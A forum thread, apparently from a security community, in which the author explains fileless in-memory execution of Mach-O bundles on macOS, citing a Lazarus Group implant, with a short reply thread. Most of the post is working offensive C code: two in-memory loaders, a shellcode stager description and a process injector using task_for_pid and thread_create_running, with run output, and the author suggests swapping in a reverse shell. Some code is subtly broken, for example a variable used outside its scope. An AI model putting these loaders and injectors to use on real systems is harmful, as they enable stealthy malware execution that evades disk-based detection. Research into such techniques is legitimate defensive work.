Executing Mach-Os In-Memory

0xf00I · December 18, 2024, 9:51pm

In-memory execution in macOS-yes, it is a thing too. Sometime ago, I read a post by Patrick Wardle about one of the Lazarus Group implants using remote downloads and in-memory execution. I decided to revisit this technique.

The term in-memory execution means running your executable code is executed right in memory without actually being written as a physical file on disk. As with any operating system, the trick is in dynamic loading. Different is the in-memory process image and its image on disk; you cannot just copy a file into memory and directly execute it. Instead, you would use APIs like NSCreateObjectFileImageFromMemory and NSLinkModule, which handle the creation of the in-memory mapping and linking, already deprecated since macOS 10.5.

I found this example here bundle-memory-load/main.c, which basically load the binary or bundle into a region of memory,

But before we cover it, we need to know what a Mach-O file is, I’ll follow this Reference check it out, Alright, Mach-O file is the standard file format for executables, object code, shared libraries, and core dumps in macOS and iOS. It is a very structured binary format in which instructions and data to run code are stored, and there are several types of them depending on how the code should be used:

Executable: This contains code and data for running a program.
Dynamic Library: dylib Shared code usable by several programs.
Bundle (.bundle): A bundle gathers code that can be loaded dynamically at runtime, such as in the case of our tutorial.

The Mach-O format consists of headers, load commands, and segments. Each of the above pieces specifies what kind of executable code, how memory is laid out, and what linkage information the loader needs at runtime. Each segment may contain executable code, initialized data, and metadata. The dynamic linker-dyld-uses this metadata to map the file into memory, resolve symbols, and execute it.

Of course, each segment has different information that comprises a Mach-O file. In general, these are the __TEXT segment of the executable code and the __DATA segment of the global variables.

~$ otool -hV /Applications/Signal.app/Contents/MacOS/Signal
/Applications/Signal.app/Contents/MacOS/Signal:
Mach header
      magic  cputype cpusubtype  caps    filetype ncmds sizeofcmds      flags
MH_MAGIC_64   X86_64        ALL LIB64     EXECUTE    16       1544   NOUNDEFS DYLDLINK TWOLEVEL PIE

~$  otool -l /Applications/Signal.app/Contents/MacOS/Signal
/Applications/Signal.app/Contents/MacOS/Signal:

Load command 0
      cmd LC_SEGMENT_64
  cmdsize 72
  segname __PAGEZERO
   vmaddr 0x0000000000000000
   vmsize 0x0000000100000000
  fileoff 0
 filesize 0
  maxprot 0x00000000
 initprot 0x00000000
   nsects 0
    flags 0x0
...

segments can be very important to understand in terms of exactly how the loading of the binary takes place, as well as how it functions once it is already in memory.

The most relevant to our format is the bundle format. A bundle is a type of dynamic library, that can be loaded at runtime, and dyld has the important job of linking and running it. When dyld processes the Mach-O headers and load commands, it maps the respective file sections into memory, sets proper permissions like READ, EXECUTE, or READ/WRITE, and resolves all required symbols before passing control to the program’s entry point.

Now let’s discuss in a little more detail what dyld does. dyld is responsible for loading Mach-O files into memory and resolving their dependencies at runtime. It does this by parsing the file’s load commands, which tell dyld what segments need to be mapped into memory, what libraries need to be linked, and what symbols need to be resolved. This is precisely what happens when an executable or bundle is loaded from disk.

But for complete in-memory code execution, without spilling any payloads on disk, we have to implement what gets done by dyld. Instead of relying on dyld to load the file off disk, we can manually load the Mach-O bundle into memory and do everything dyld normally does. That includes mapping the segments into memory, setting permissions, and resolving symbols.

Here’s an post by Adam Chester of how to patch dyld to load Mach-O bundles completely in memory, which allows us never to have to touch the disk. It’s a cool technique that enables us not to leave any kind of artifact on the disk, hence this is pretty useful for stealth.

When dyld loads a Mach-O file, it reads the header to understand the general layout of the file and then processes the load commands, working out how to map in the different segments. These segments are then mapped with appropriate permissions; for example, the __TEXT segment is normally marked executable, while the __DATA segment is marked as writable. Finally, dyld performs the symbol resolution and transfers control to the entry point, executing the code.

We can load and execute Mach-O files completely in memory by emulating this process, without the need to write anything to disk. That’s exactly what our example does: it opens a Mach-O bundle, maps it into memory, creates an object file image, links the module, resolves the symbol for the function we want to execute, and finally calls that function, I’m repeating myself here

Now that we understand the inner workings of Mach-O files and how dyld processes them, let’s move forward with actual examples that tie together everything we’ve discussed. The goal is to demonstrate how we can emulate dyld’s behavior in loading and executing Mach-O bundles entirely in memory, avoiding the need to write payloads to disk.

check out this piece of code that loads a Mach-O bundle into memory, maps the necessary segments, resolves symbols, and then calls a function from the bundle. In this example, we assume that the Mach-O bundle contains a function called _execute, which we will invoke after loading the bundle in memory.

// MachODynamicLoader.c
// Dynamically loads and executes a Mach-O bundle (_execute symbol).
// Uses dyld APIs to memory-map, link, resolve, and call.

#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/dyld.h>

int main() {
    struct stat sb; void *code = NULL;
    NSObjectFileImage img = NULL; NSModule mdl = NULL; NSSymbol sym = NULL;
    void (*exec_fn)() = NULL;

    int fd = open("test.bundle", O_RDONLY); // open file
    if (fd < 0 || fstat(fd, &sb) < 0) return 1;

    // map Mach-O file
    code = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0); close(fd);
    if (code == MAP_FAILED) return 1;

    // create object file image
    if (NSCreateObjectFileImageFromMemory(code, sb.st_size, &img) != NSObjectFileImageSuccess)
        return munmap(code, sb.st_size), 1;

    // link module
    mdl = NSLinkModule(img, "module", NSLINKMODULE_OPTION_NONE);
    if (!mdl) return NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // resolve "_execute" symbol
    sym = NSLookupSymbolInModule(mdl, "_execute");
    if (!sym) return NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE), 
                  NSDestroyObjectFileImage(img), munmap(code, sb.st_size), 1;

    // call resolved symbol
    if ((exec_fn = NSAddressOfSymbol(sym))) exec_fn();

    // cleanup
    NSUnLinkModule(mdl, NSUNLINKMODULE_OPTION_NONE);
    NSDestroyObjectFileImage(img);
    return munmap(code, sb.st_size), 0;
}

Here, we’ve essentially emulated the operations that dyld performs to load and execute Mach-O files, but we do everything in memory. Ordinarily, dyld parses the Mach-O from disk, maps the segments into memory, resolves symbols, and transfers control to the executable code. By mapping the file directly into memory ourselves, we bypass dyld, handling the linking and symbol resolution manually, thus completing the process entirely in memory.

However, remember that these methods have been deprecated since macOS 10.5. They technically worked on older operating systems, but Apple no longer supports them, and modern systems may prevent their use in newer applications. In contemporary macOS, particularly, many of these functions are either heavily sandboxed or entirely blocked in environments where System Integrity Protection (SIP) is enabled.

Since macOS 10.5, dynamic loading via the dlopen family of functions has been the preferred approach: dlopen, dlsym, dlclose. This allows for dynamic loading at runtime, symbol resolution, and unloading of libraries. However, dlopenstill expects a file on disk. For purely in-memory execution, we need to manually parsing Mach-O headers and setting up memory regions with mmap, mimicking dyld’s operations.

Next, let’s expand our example to include another method for in-memory loading using completely non-deprecated functions,

// MachOLoader.c 
// Loads, resolves, and executes _execute from a Mach-O bundle 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <fcntl.h>

#include <sys/mman.h>
#include <sys/stat.h>

#include <mach-o/loader.h>
#include <mach-o/nlist.h>

void load_macho(const char *path) {
    int fd = open(path, O_RDONLY); if (fd < 0) return;
    struct stat sb; if (fstat(fd, &sb) < 0) { close(fd); return; }
    void *codeAddr = mmap(NULL, sb.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); close(fd);
    if (codeAddr == MAP_FAILED) return;

    struct mach_header_64 *header = (struct mach_header_64 *)codeAddr;
    if (header->magic != MH_MAGIC_64) return munmap(codeAddr, sb.st_size), 0;

    struct load_command *loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SEGMENT_64) {
            struct segment_command_64 *segCmd = (struct segment_command_64 *)loadCmd;
            void *segAddr = mmap((void *)segCmd->vmaddr, segCmd->vmsize, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
            if (segAddr == MAP_FAILED) { munmap(codeAddr, sb.st_size); return; }
            memcpy(segAddr, codeAddr + segCmd->fileoff, segCmd->filesize);
        }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    struct symtab_command *symTabCmd = NULL; loadCmd = (struct load_command *)(header + 1);
    for (uint32_t i = 0; i < header->ncmds; i++) {
        if (loadCmd->cmd == LC_SYMTAB) { symTabCmd = (struct symtab_command *)loadCmd; break; }
        loadCmd = (struct load_command *)((char *)loadCmd + loadCmd->cmdsize);
    }

    if (symTabCmd) {
        struct nlist_64 *symTbl = (struct nlist_64 *)(codeAddr + symTabCmd->symoff);
        char *strTbl = (char *)(codeAddr + symTabCmd->stroff);
        for (uint32_t i = 0; i < symTabCmd->nsyms; i++) {
            if (strcmp(strTbl + symTbl[i].n_un.n_strx, "_execute") == 0) {
                ((void (*)())(segAddr + symTbl[i].n_value))();
            }
        }
    }
    munmap(codeAddr, sb.st_size);
}

int main() { load_macho("test.bundle"); return 0; }

The logic is: we create a function called load_macho, accepting as an argument the path to the Mach-O. It opens the file, checks the size of the file, and then memory maps it into our processes’ address space. Then we check that a Mach-O header is indeed a 64-bit file, and we iterate through its load commands to map all the needed segments into executable memory.

Finally, we manually handle symbol resolution by searching the _execute symbol in the symbol table and calling it if found. In this manner, we are effectively proving how in-memory execution would be able to take place without writing anything on the disk.

Alternative approach, we highlight another way of performing in-memory execution by injecting and executing shellcode directly. For this, you can refer back to the earlier part where we discussed writing 64-bit assembly shellcode for macOS. That shellcode can then be converted into machine code and staged in memory using techniques like mmap and mprotect.

Here’s how you can showcase a simple stager dropper that executes a small payload (shellcode) to download or pull in another payload into memory. The downloaded payload is then executed directly from memory using Mach-O format techniques, as we discussed earlier.

We simulates downloading the payload into memory, but instead of downloading it over the network, we use a hardcoded shellcode. The is just a small snippet of machine code that prints “Hello World”. and mmap() to allocate memory with READ/WRITE permissions, then copy the shellcode into this allocated space.

Next, we use mprotect() to change the memory permissions to READ/EXECUTE, making it executable. Finally, run_payload() executes the shellcode directly from memory by casting the memory pointer to a function pointer and calling it.

Virtual Memory Map of process 1195 (PayloadStager)
Output report format:  2.4  -- 64-bit process
VM page size:  4096 bytes

==== Non-writable regions for process 1195
REGION TYPE                    START - END         [ VSIZE  RSDNT  DIRTY   SWAP] PRT/MAX SHRMOD PURGE    REGION DETAIL
__TEXT                      105899000-10589d000    [   16K    16K     0K     0K] r-x/r-x SM=COW          /Users/USER/*/PayloadStager
__DATA_CONST                10589d000-1058a1000    [   16K    16K     4K     0K] r--/rw- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a5000-1058a6000    [    4K     4K     0K     0K] r--/r-- SM=COW          /Users/USER/*/PayloadStager
__LINKEDIT                  1058a6000-1058a9000    [   12K     0K     0K     0K] r--/r-- SM=NUL          /Users/USER/*/PayloadStager
dyld private memory         1058a9000-1059a9000    [ 1024K    12K    12K     0K] r--/rwx SM=PRV
shared memory               1059ab000-1059ad000    [    8K     8K     8K     0K] r--/r-- SM=SHM
MALLOC metadata             1059ad000-1059ae000    [    4K     4K     4K     0K] r--/rwx SM=ZER          
MALLOC guard page           1059b2000-1059b3000    [    4K     0K     0K     0K] ---/rwx SM=ZER
MALLOC guard page           1059b7000-1059b8000    [    4K     0K     0K     0K] ---/rwx SM=ZER
MALLOC guard page           1059b8000-1059b9000    [    4K     0K     0K     0K] ---/rwx SM=NUL
MALLOC guard page           1059bd000-1059be000    [    4K     0K     0K     0K] ---/rwx SM=NUL
MALLOC metadata             1059be000-1059bf000    [    4K     4K     4K     0K] r--/rwx SM=PRV
MALLOC metadata             1059bf000-1059c0000    [    4K     4K     4K     0K] r--/rwx SM=ZER

As expected, the executable code resides in the __TEXT segment, which has r-x permissions. This indicates that the memory is readable and executable, but not writable, as is typical for code segments.

We note, that the dyld private memory area has both writable and executable permissions: rwx. It means memory was previously mapped as being writable and afterwards became executable. This indeed shows from the r--/rwx permissions in the dyld private memory region. and the process-specific memory by the attribute string SM=PRV, which corroborates what would have been the case when using mmap for shellcode execution, shown in this code.

and if we follow this closely, as we can see system call allocates memory at address 0x10EA93000 with an initial set of permissions. The PROT_READ | PROT_WRITEflag (0x1) allows for reading and writing to the allocated memory.

and also The mprotect system call is used to modify the memory permissions. In this case, the memory at address 0x10EA95000 is changed from writable to executable (PROT_READ | PROT_EXEC, represented by 0x3).

and Finally, the 0x5 indicates PROT_READ | PROT_EXEC (execute permission is being granted), which allows the payload to run from this memory region.

This of course the most basic, naive way, if we wanna play a little we can introduce payload into the memory of another process using the Mach VM API, follow the same principle’s. but hy you can use maybe task_for_pid but make sure have privileges.

To give you an idea, maybe I don’t know, just allocate some memory, drop the shellcode in, make it executable, and let it run. Something like this: First, we grab the target process’s memory using mach_vm_allocate. We want to reserve a chunk of space that can hold our shellcode. This is where our executable code will live. Once we have the space, we proceed to write the shellcode into that memory region with mach_vm_write. At this stage, make sure that the shellcode is properly laid out in memory for execution.

Next, we set the memory protections with mach_vm_protect, making it executable. This allows our shellcode to run without hitting any access violations. Now, with the shellcode in place and ready to execute, need to create a thread within the target process. this can be done with thread_create_running, pointing the program counter to our shellcode’s address and setting the stack pointer appropriately.

// MachInjector.c - Injects and exec 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <mach/mach.h>
#include <mach/mach_vm.h>

#define SHELLCODE_SIZE 128
#define STACK_SIZE     (SHELLCODE_SIZE * 4)

unsigned char shellcode[] = {
    0x90, 0x90, 0x90,                
    0x90, 0xeb, 0x1e,             // jmp    0x1e
    0x5e,                         // pop    rsi 
    0xb8, 0x04, 0x00, 0x00, 0x02, // mov    eax, 4 (write)
    0xbf, 0x01, 0x00, 0x00, 0x00, // mov    edi, 1 (stdout)
    0xba, 0x0e, 0x00, 0x00, 0x00, // mov    edx, 0x0e 
    0x0f, 0x05,                   // syscall
    0xb8, 0x01, 0x00, 0x00, 0x02, // mov    eax, 1 
    0xbf, 0x00, 0x00, 0x00, 0x00, // mov    edi, 0 (exit)
    0x0f, 0x05,                   // syscall
    0xe8, 0xdd, 0xff, 0xff, 0xff, // call   back to jmp
    0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f, 
    0x72, 0x6c, 0x64, 0x21, 0x0d, 0x0a   // "Hello World!\r\n"
};

void allocate_stuff(task_t task, mach_vm_address_t *shellcode_addr, mach_vm_address_t *stack_addr) {
    mach_vm_allocate(task, shellcode_addr, SHELLCODE_SIZE, VM_FLAGS_ANYWHERE);
    mach_vm_write(task, *shellcode_addr, (vm_offset_t)shellcode, SHELLCODE_SIZE);
    mach_vm_protect(task, *shellcode_addr, SHELLCODE_SIZE, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
    mach_vm_allocate(task, stack_addr, STACK_SIZE, VM_FLAGS_ANYWHERE);
}

void do_the_injection(pid_t pid) {
    task_t task;
    mach_vm_address_t shellcode_addr = 0, stack_addr = 0;
    task_for_pid(mach_task_self(), pid, &task);

    allocate_stuff(task, &shellcode_addr, &stack_addr);

    x86_thread_state64_t state = {0};
    state.__rip = (uint64_t)shellcode_addr;
    state.__rsp = stack_addr + STACK_SIZE;

    thread_act_t thread;
    thread_create_running(task, x86_THREAD_STATE64, (thread_state_t)&state, x86_THREAD_STATE64_COUNT, &thread);
    printf("[+] Injected into %d\n", pid);
}

int main(int argc, char *argv[]) {
    if (argc < 2) { printf("Usage: %s <PID>\n", argv[0]); return -1; }
    do_the_injection(atoi(argv[1]));
    return 0;
}

Instead of printing “Hello World!”, you could change the shellcode to spawn a shell, execute a revshell, But regardless of what the shellcode does, the flow remains similar: allocate memory, write the code, make it executable, set up the env, and then execute it.

r 5294
Process 5301 launched: '/Users/i/src/exec' (x86_64)
[+] Injected into 5294
Process 5301 exited with status = 0 (0x00000000)

Hello World!                                                                     
[1]  + 5294 done

if you somehow jumped directly here, The code uses task_for_pid(), mach_vm_allocate(), and mach_vm_write(), which macOS restricts to processes with admin rights thanks to SIP, of course.

We launch the executable using lldb, the debugger. which confirms that the stack memory was also allocated, setting up the env for our shellcode, you can debug it more.

This code demonstrates what we’ve covered so far, but here’s the catch !yep privileges to run. I’ll demo that in the example. if you’re thinking about injection, remember: Regular users don’t get unrestricted access to core functionality. That’s by design.

If you’re serious about payload delivery or injection methods, take time to understand why these security measures exist, I recommend HackTricks’ macOS SIP and Bypass Techniques. It’s an excellent resource check it out!

messede · December 19, 2024, 4:01pm

Wow, this is way harder in mac huh. As a side note THC’s skyper and i wrote a small bash utility to do something similar on linux, you can read about it here: Bypassing noexec and executing arbitrary binaries.

0xf00I · December 19, 2024, 11:03pm

Yeah, mac has a lot of sec in place that makes code injection tough, unlike Linux where some of that stuff isn’t always on by default. Nice piece though, Thanks for sharing! It’s clean and clever. I mean, Overwriting Bash’s .text segment? That’s cold.

system · April 19, 2025, 1:52pm

This topic was automatically closed after 121 days. New replies are no longer allowed.